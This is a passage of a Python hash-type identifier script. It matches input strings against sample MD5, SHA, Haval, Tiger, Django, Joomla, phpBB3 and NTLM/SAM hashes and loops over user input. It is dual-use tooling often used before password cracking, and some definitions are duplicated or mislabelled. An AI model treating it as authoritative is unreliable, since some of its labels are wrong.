if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106200")
|
||||||
|
def SNEFRU128HMAC(hash):
|
||||||
|
hs='59b2b9dcc7a9a7d089cecf1b83520350'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106205")
|
||||||
|
def Tiger128(hash):
|
||||||
|
hs='c086184486ec6388ff81ec9f23528727'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106220")
|
||||||
|
def Tiger128HMAC(hash):
|
||||||
|
hs='c87032009e7c4b2ea27eb6f99723454b'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106225")
|
||||||
|
def md5passsalt(hash):
|
||||||
|
hs='5634cc3b922578434d6e9342ff5913f7'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106240")
|
||||||
|
def md5saltmd5pass(hash):
|
||||||
|
hs='245c5763b95ba42d4b02d44bbcd916f1'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106260")
|
||||||
|
def md5saltpass(hash):
|
||||||
|
hs='22cc5ce1a1ef747cd3fa06106c148dfa'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106280")
|
||||||
|
def md5saltpasssalt(hash):
|
||||||
|
hs='469e9cdcaff745460595a7a386c4db0c'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106300")
|
||||||
|
def md5saltpassusername(hash):
|
||||||
|
hs='9ae20f88189f6e3a62711608ddb6f5fd'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106320")
|
||||||
|
def md5saltmd5pass(hash):
|
||||||
|
hs='aca2a052962b2564027ee62933d2382f'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106340")
|
||||||
|
def md5saltmd5passsalt(hash):
|
||||||
|
hs='de0237dc03a8efdf6552fbe7788b2fdd'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106360")
|
||||||
|
def md5saltmd5passsalt(hash):
|
||||||
|
hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106380")
|
||||||
|
def md5saltmd5saltpass(hash):
|
||||||
|
hs='d8f3b3f004d387086aae24326b575b23'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106400")
|
||||||
|
def md5saltmd5md5passsalt(hash):
|
||||||
|
hs='81f181454e23319779b03d74d062b1a2'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106420")
|
||||||
|
def md5username0pass(hash):
|
||||||
|
hs='e44a60f8f2106492ae16581c91edb3ba'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106440")
|
||||||
|
def md5usernameLFpass(hash):
|
||||||
|
hs='654741780db415732eaee12b1b909119'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106460")
|
||||||
|
def md5usernamemd5passsalt(hash):
|
||||||
|
hs='954ac5505fd1843bbb97d1b2cda0b98f'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106480")
|
||||||
|
def md5md5pass(hash):
|
||||||
|
hs='a96103d267d024583d5565436e52dfb3'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106500")
|
||||||
|
def md5md5passsalt(hash):
|
||||||
|
hs='5848c73c2482d3c2c7b6af134ed8dd89'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106520")
|
||||||
|
def md5md5passmd5salt(hash):
|
||||||
|
hs='8dc71ef37197b2edba02d48c30217b32'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106540")
|
||||||
|
def md5md5saltpass(hash):
|
||||||
|
hs='9032fabd905e273b9ceb1e124631bd67'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106560")
|
||||||
|
def md5md5saltmd5pass(hash):
|
||||||
|
hs='8966f37dbb4aca377a71a9d3d09cd1ac'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106580")
|
||||||
|
def md5md5usernamepasssalt(hash):
|
||||||
|
hs='4319a3befce729b34c3105dbc29d0c40'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106600")
|
||||||
|
def md5md5md5pass(hash):
|
||||||
|
hs='ea086739755920e732d0f4d8c1b6ad8d'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106620")
|
||||||
|
def md5md5md5md5pass(hash):
|
||||||
|
hs='02528c1f2ed8ac7d83fe76f3cf1c133f'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106640")
|
||||||
|
def md5md5md5md5md5pass(hash):
|
||||||
|
hs='4548d2c062933dff53928fd4ae427fc0'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106660")
|
||||||
|
def md5sha1pass(hash):
|
||||||
|
hs='cb4ebaaedfd536d965c452d9569a6b1e'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106680")
|
||||||
|
def md5sha1md5pass(hash):
|
||||||
|
hs='099b8a59795e07c334a696a10c0ebce0'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106700")
|
||||||
|
def md5sha1md5sha1pass(hash):
|
||||||
|
hs='06e4af76833da7cc138d90602ef80070'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106720")
|
||||||
|
def md5strtouppermd5pass(hash):
|
||||||
|
hs='519de146f1a658ab5e5e2aa9b7d2eec8'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("106740")
|
||||||
|
|
||||||
|
def LineageIIC4(hash):
|
||||||
|
hs='0x49a57f66bd3d5ba6abda5579c264a0e4'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0:
|
||||||
|
jerar.append("107080")
|
||||||
|
def MD5phpBB3(hash):
|
||||||
|
hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0:
|
||||||
|
jerar.append("107040")
|
||||||
|
def MD5Unix(hash):
|
||||||
|
hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0:
|
||||||
|
jerar.append("107060")
|
||||||
|
def MD5Wordpress(hash):
|
||||||
|
hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0:
|
||||||
|
jerar.append("107020")
|
||||||
|
|
||||||
|
def MD5APR(hash):
|
||||||
|
hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0:
|
||||||
|
jerar.append("108020")
|
||||||
|
|
||||||
|
def Haval160(hash):
|
||||||
|
hs='a106e921284dd69dad06192a4411ec32fce83dbb'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109100")
|
||||||
|
def Haval160HMAC(hash):
|
||||||
|
hs='29206f83edc1d6c3f680ff11276ec20642881243'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109200")
|
||||||
|
def MySQL5(hash):
|
||||||
|
hs='9bb2fb57063821c762cc009f7584ddae9da431ff'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109040")
|
||||||
|
def MySQL160bit(hash):
|
||||||
|
hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0:
|
||||||
|
jerar.append("109060")
|
||||||
|
def RipeMD160(hash):
|
||||||
|
hs='dc65552812c66997ea7320ddfb51f5625d74721b'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109120")
|
||||||
|
def RipeMD160HMAC(hash):
|
||||||
|
hs='ca28af47653b4f21e96c1235984cb50229331359'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109180")
|
||||||
|
def SHA1(hash):
|
||||||
|
hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109020")
|
||||||
|
def SHA1HMAC(hash):
|
||||||
|
hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109140")
|
||||||
|
def SHA1MaNGOS(hash):
|
||||||
|
hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109220")
|
||||||
|
def SHA1MaNGOS2(hash):
|
||||||
|
hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109240")
|
||||||
|
def Tiger160(hash):
|
||||||
|
hs='c086184486ec6388ff81ec9f235287270429b225'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109080")
|
||||||
|
def Tiger160HMAC(hash):
|
||||||
|
hs='6603161719da5e56e1866e4f61f79496334e6a10'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109160")
|
||||||
|
def sha1passsalt(hash):
|
||||||
|
hs='f006a1863663c21c541c8d600355abfeeaadb5e4'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109260")
|
||||||
|
def sha1saltpass(hash):
|
||||||
|
hs='299c3d65a0dcab1fc38421783d64d0ecf4113448'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109280")
|
||||||
|
def sha1saltmd5pass(hash):
|
||||||
|
hs='860465ede0625deebb4fbbedcb0db9dc65faec30'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109300")
|
||||||
|
def sha1saltmd5passsalt(hash):
|
||||||
|
hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109320")
|
||||||
|
def sha1saltsha1pass(hash):
|
||||||
|
hs='58714327f9407097c64032a2fd5bff3a260cb85f'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109340")
|
||||||
|
def sha1saltsha1saltsha1pass(hash):
|
||||||
|
hs='cc600a2903130c945aa178396910135cc7f93c63'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109360")
|
||||||
|
def sha1usernamepass(hash):
|
||||||
|
hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109380")
|
||||||
|
def sha1usernamepasssalt(hash):
|
||||||
|
hs='00025111b3c4d0ac1635558ce2393f77e94770c5'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109400")
|
||||||
|
def sha1md5pass(hash):
|
||||||
|
hs='fa960056c0dea57de94776d3759fb555a15cae87'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("1094202")
|
||||||
|
def sha1md5passsalt(hash):
|
||||||
|
hs='1dad2b71432d83312e61d25aeb627593295bcc9a'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109440")
|
||||||
|
def sha1md5sha1pass(hash):
|
||||||
|
hs='8bceaeed74c17571c15cdb9494e992db3c263695'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109460")
|
||||||
|
def sha1sha1pass(hash):
|
||||||
|
hs='3109b810188fcde0900f9907d2ebcaa10277d10e'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109480")
|
||||||
|
def sha1sha1passsalt(hash):
|
||||||
|
hs='780d43fa11693b61875321b6b54905ee488d7760'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109500")
|
||||||
|
def sha1sha1passsubstrpass03(hash):
|
||||||
|
hs='5ed6bc680b59c580db4a38df307bd4621759324e'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109520")
|
||||||
|
def sha1sha1saltpass(hash):
|
||||||
|
hs='70506bac605485b4143ca114cbd4a3580d76a413'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109540")
|
||||||
|
def sha1sha1sha1pass(hash):
|
||||||
|
hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109560")
|
||||||
|
def sha1strtolowerusernamepass(hash):
|
||||||
|
hs='79f575543061e158c2da3799f999eb7c95261f07'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("109580")
|
||||||
|
|
||||||
|
def Haval192(hash):
|
||||||
|
hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("110040")
|
||||||
|
def Haval192HMAC(hash):
|
||||||
|
hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("110080")
|
||||||
|
def Tiger192(hash):
|
||||||
|
hs='c086184486ec6388ff81ec9f235287270429b2253b248a70'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("110020")
|
||||||
|
def Tiger192HMAC(hash):
|
||||||
|
hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("110060")
|
||||||
|
|
||||||
|
def MD5passsaltjoomla1(hash):
|
||||||
|
hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
|
||||||
|
jerar.append("112020")
|
||||||
|
|
||||||
|
def SHA1Django(hash):
|
||||||
|
hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0:
|
||||||
|
jerar.append("113020")
|
||||||
|
|
||||||
|
def Haval224(hash):
|
||||||
|
hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("114040")
|
||||||
|
def Haval224HMAC(hash):
|
||||||
|
hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("114080")
|
||||||
|
def SHA224(hash):
|
||||||
|
hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("114020")
|
||||||
|
def SHA224HMAC(hash):
|
||||||
|
hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("114060")
|
||||||
|
|
||||||
|
def SHA256(hash):
|
||||||
|
hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("115020")
|
||||||
|
def SHA256HMAC(hash):
|
||||||
|
hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("115120")
|
||||||
|
def Haval256(hash):
|
||||||
|
hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("115040")
|
||||||
|
def Haval256HMAC(hash):
|
||||||
|
hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("115140")
|
||||||
|
def GOSTR341194(hash):
|
||||||
|
hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("115060")
|
||||||
|
def RipeMD256(hash):
|
||||||
|
hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("115080")
|
||||||
|
def RipeMD256HMAC(hash):
|
||||||
|
hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("115160")
|
||||||
|
def SNEFRU256(hash):
|
||||||
|
hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("115100")
|
||||||
|
def SNEFRU256HMAC(hash):
|
||||||
|
hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("115180")
|
||||||
|
def SHA256md5pass(hash):
|
||||||
|
hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("115200")
|
||||||
|
def SHA256sha1pass(hash):
|
||||||
|
hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("115220")
|
||||||
|
|
||||||
|
def MD5passsaltjoomla2(hash):
|
||||||
|
hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
|
||||||
|
jerar.append("116020")
|
||||||
|
def SAM(hash):
|
||||||
|
hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0:
|
||||||
|
jerar.append("116040")
|
||||||
|
|
||||||
|
def SHA256Django(hash):
|
||||||
|
hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0:
|
||||||
|
jerar.append("117020")
|
||||||
|
|
||||||
|
def RipeMD320(hash):
|
||||||
|
hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("118020")
|
||||||
|
def RipeMD320HMAC(hash):
|
||||||
|
hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("118040")
|
||||||
|
|
||||||
|
def SHA384(hash):
|
||||||
|
hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("119020")
|
||||||
|
def SHA384HMAC(hash):
|
||||||
|
hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("119040")
|
||||||
|
|
||||||
|
def SHA256s(hash):
|
||||||
|
hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
|
||||||
|
jerar.append("120020")
|
||||||
|
|
||||||
|
def SHA384Django(hash):
|
||||||
|
hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
|
||||||
|
jerar.append("121020")
|
||||||
|
|
||||||
|
def SHA512(hash):
|
||||||
|
hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("122020")
|
||||||
|
def SHA512HMAC(hash):
|
||||||
|
hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("122060")
|
||||||
|
def Whirlpool(hash):
|
||||||
|
hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("122040")
|
||||||
|
def WhirlpoolHMAC(hash):
|
||||||
|
hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
|
||||||
|
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||||
|
jerar.append("122080")
|
||||||
|
|
||||||
|
|
||||||
|
print(logo)
|
||||||
|
try:
|
||||||
|
first = str(argv[1])
|
||||||
|
except:
|
||||||
|
first = None
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
jerar=[]
|
||||||
|
print("-"*50)
|
||||||
|
if first:
|
||||||
|
h = first
|
||||||
|
else:
|
||||||
|
h = input(" HASH: ")
|
||||||
|
|
||||||
|
ADLER32(h); CRC16(h); CRC16CCITT(h); CRC32(h); CRC32B(h); DESUnix(h); DomainCachedCredentials(h); FCS16(h); GHash323(h); GHash325(h); GOSTR341194(h); Haval128(h); Haval128HMAC(h); Haval160(h); Haval160HMAC(h); Haval192(h); Haval192HMAC(h); Haval224(h); Haval224HMAC(h); Haval256(h); Haval256HMAC(h); LineageIIC4(h); MD2(h); MD2HMAC(h); MD4(h); MD4HMAC(h); MD5(h); MD5APR(h); MD5HMAC(h); MD5HMACWordpress(h); MD5phpBB3(h); MD5Unix(h); MD5Wordpress(h); MD5Half(h); MD5Middle(h); MD5passsaltjoomla1(h); MD5passsaltjoomla2(h); MySQL(h); MySQL5(h); MySQL160bit(h); NTLM(h); RAdminv2x(h); RipeMD128(h); RipeMD128HMAC(h); RipeMD160(h); RipeMD160HMAC(h); RipeMD256(h); RipeMD256HMAC(h); RipeMD320(h); RipeMD320HMAC(h); SAM(h); SHA1(h); SHA1Django(h); SHA1HMAC(h); SHA1MaNGOS(h); SHA1MaNGOS2(h); SHA224(h); SHA224HMAC(h); SHA256(h); SHA256s(h); SHA256Django(h); SHA256HMAC(h); SHA256md5pass(h); SHA256sha1pass(h); SHA384(h); SHA384Django(h); SHA384HMAC(h); SHA512(h); SHA512HMAC(h); SNEFRU128(h); SNEFRU128HMAC(h); SNEFRU256(h); SNEFRU256HMAC(h); 